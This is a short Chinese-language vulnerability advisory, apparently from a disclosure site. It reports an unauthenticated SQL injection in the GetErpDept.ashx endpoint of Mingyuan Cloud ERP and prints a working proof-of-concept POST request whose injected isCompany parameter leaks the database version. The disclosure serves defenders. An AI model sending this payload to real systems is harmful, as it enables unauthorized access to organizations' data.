明源云ERP系统 GetErpDept.ashx 接口存在SQL注入漏洞

日期: 2025-08-22 | 影响软件: 明源云ERP系统 | POC: 已公开

漏洞描述

明源云ERP系统是明源云集团控股有限公司开发的一款面向房地产行业的企业资源计划(ERP)解决方案,旨在帮助房地产企业实现业务数字化和精细化管理。未经身份验证的攻击者可在 GetErpDept.ashx 接口处构造恶意请求获取敏感信息内容。

PoC代码

POST /XmjdUI/Handle/GetErpDept.ashx HTTP/1.1
Content-Type: application/x-www-form-urlencoded

isCompany=') and 1=@@VERSION--

相关漏洞推荐